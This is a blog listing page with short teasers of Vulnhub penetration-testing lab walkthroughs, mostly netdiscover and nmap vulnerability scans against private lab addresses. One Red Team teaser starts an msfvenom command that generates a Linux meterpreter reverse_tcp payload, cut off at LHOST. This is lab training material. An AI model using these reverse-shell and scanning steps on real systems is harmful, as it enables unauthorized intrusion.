HackerGu‘s Blog-致力于网络安全技术研究HackerGu‘s Blog

天道酬勤

【今日观点】 Nightfall-WALKTHROUGH

一、主机发现 使用netdiscover进行主机查找,查找到目标IP为192.168.203.141 二、端口扫描 root@kali:~# nmap -sS -A 192.168.203.141 --script=vuln Startin...

【Vulnhub】— Kioptrix4-HackerGu‘s Blog
OSCP

【Vulnhub】— Kioptrix4

Gu阅读(12)评论(0)赞(0)

一、主机发现 使用netdiscover,发现其IP为192.168.203.136 二、端口扫描 root@kali:~# nmap -sV -A 192.168.203.136 --script=vuln Starting Nmap 7...

【Vulnhub】DC-9-HackerGu‘s Blog
OSCP

【Vulnhub】DC-9

Gu阅读(13)评论(0)赞(0)

一、主机发现 使用netdiscover发现主机为192.168.203.135 二、端口扫描 使用Nmap: root@kali:~# nmap -sV -A 192.168.203.135 --script=vuln Starting ...

【Vulnhub】—DC-8-HackerGu‘s Blog
OSCP

【Vulnhub】—DC-8

Gu阅读(13)评论(0)赞(0)

一、主机发现 使用netdiscover,发现主机IP为192.168.203.134。 二、端口扫描 root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln Starting Nmap...

【Vulnhub】— DC-7-HackerGu‘s Blog
OSCP

【Vulnhub】— DC-7

Gu阅读(18)评论(0)赞(0)

一、端口扫描 因为本靶机在打开的时候,就已给出了IP,所以直接扫描端口即可。 利用nmap: root@kali:~# nmap -sV -A 192.168.203.133 --script=vuln Starting Nmap 7.80...

【Vulnhub】— DC-6-HackerGu‘s Blog
OSCP

【Vulnhub】— DC-6

Gu阅读(23)评论(0)赞(0)

主机发现 使用netdiscover命令,发现主机IP为192.168.203.132 端口探测 使用Nmap,nmap -sV -A 192.168.203.132 --script=vuln。 探测结果: root@kali:~# nm...

【Vulnhub】— DC-5-HackerGu‘s Blog
OSCP

【Vulnhub】— DC-5

Gu阅读(51)评论(0)赞(0)

主机发现 利用netdiscover发现主机,192.168.203.130 端口扫描 利用Nmap: root@kali:~# nmap -sV -A 192.168.203.130 --script=vuln Starting Nmap...

Msf和CS上线不出网的机器-HackerGu‘s Blog
Red Team

Msf和CS上线不出网的机器

Gu阅读(73)评论(0)赞(0)

内网中的很多机器是不可以出网的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1...

CFS靶机—多层内网渗透靶机-HackerGu‘s Blog
网络安全

CFS靶机—多层内网渗透靶机

Gu阅读(74)评论(0)赞(1)

  CFS靶机搭建—https://www.anquanke.com/post/id/187908#h2-10 靶机搭建 靶机搭建是我最头疼的地方,下面写一下配置的关键点。 在vm虚拟机中,最为重要的就是这里:虚拟网络编辑器 其中...

【Vulnhub】— DC-4-HackerGu‘s Blog
网络安全

【Vulnhub】— DC-4

Gu阅读(29)评论(0)赞(0)

主机发现 在kali中使用netdiscover,发现机器192.168.234.179 端口扫描 使用Nmap,利用命令nmap -sV -A 192.168.234.179 --script=vuln root@kali:~# nmap...

专注黑客技术的研究

联系我们联系我们